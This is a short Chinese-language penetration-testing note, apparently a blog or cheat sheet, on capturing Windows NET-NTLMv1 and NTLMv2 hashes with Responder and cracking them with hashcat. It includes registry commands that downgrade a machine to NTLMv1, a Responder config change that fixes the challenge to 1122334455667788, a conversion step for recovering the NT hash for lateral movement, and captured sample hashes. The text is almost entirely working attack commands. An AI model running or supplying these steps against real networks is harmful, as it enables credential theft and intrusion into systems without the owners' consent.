NET NTLMv1还原破解&v2破解

NET-NTLMv1破解

sudo responder -I eth1 -rPv
# 开启监听

hashcat -m 5500 test1::FBI:19855A14AEAAA6BC00000000000000000000000000000000:CDDA70602BB160B8E00FAF2386E17755316DEA48DE04CB09:6783537172a9d1bc pwd.txt
# 将监听到的hash拿去hashcat破解，pwd.txt为密码字典

注：

测试时可以通过更改注册表将NET-NTLMv2降到NET-NTLMv1开启
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ /v NtlmMinClientSec /t REG_DWORD /d 536870912 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ /v RestrictSendingNTLMTraffic /t REG_DWORD /d 0 /f

NET-NTLMv1还原

vim /etc/responder/Responder.conf
# 更改Challenge = random为Challenge = 1122334455667788

sudo responder -I eth1 -rPv --lm
# 开启监听，加上lm参数
# 近几年的机器会受到保护不允许通过smb v1，可以使用win7机器测试
# 可以发现获取到的hash没有-SSP的字样

python3 ntlmv1.py --nossp test2::FBI:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:1122334455667788 
# 将监听到的hash放到ntlmv1-multi里面的ntlmv1.py转换，工具地址为https://github.com/evilmog/ntlmv1-multi

将获取到的NTHASH放到Get Cracking | crack.sh还原即可，这样获取到的ntlmv1 hash一定可以还原为NTLM hash，然后可以拿去横向，但是这个网站最近无法使用，贴一个网上其他师傅的图

图片来源：Net- NTLM 利用 - windows protocol (gitbook.io)

NET-NTLMv2破解

sudo responder -I eth1 -rPv
# 开启监听

hashcat -m 5600 test1::FBI:e53f04274fccde3a:68932C0FFB56AC2D5DEFE54DBD1785ED:01010000000000008050B91A418AD90147C1DEC2EEF5BE1000000000020008004B0054004300440001001E00570049004E002D003500520032003300310045004B005200450043004C0004003400570049004E002D003500520032003300310045004B005200450043004C002E004B005400430044002E004C004F00430041004C00030014004B005400430044002E004C004F00430041004C00050014004B005400430044002E004C004F00430041004C00070008008050B91A418AD901060004000200000008003000300000000000000001000000002000001C477CB4727D2946C87A7F9B4F0212D2376381EBEF50E1F583B56F08FCD7506F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310030002E00310030000000000000000000  pwd.txt
# 将监听到的hash拿去hashcat破解，pwd.txt为密码字典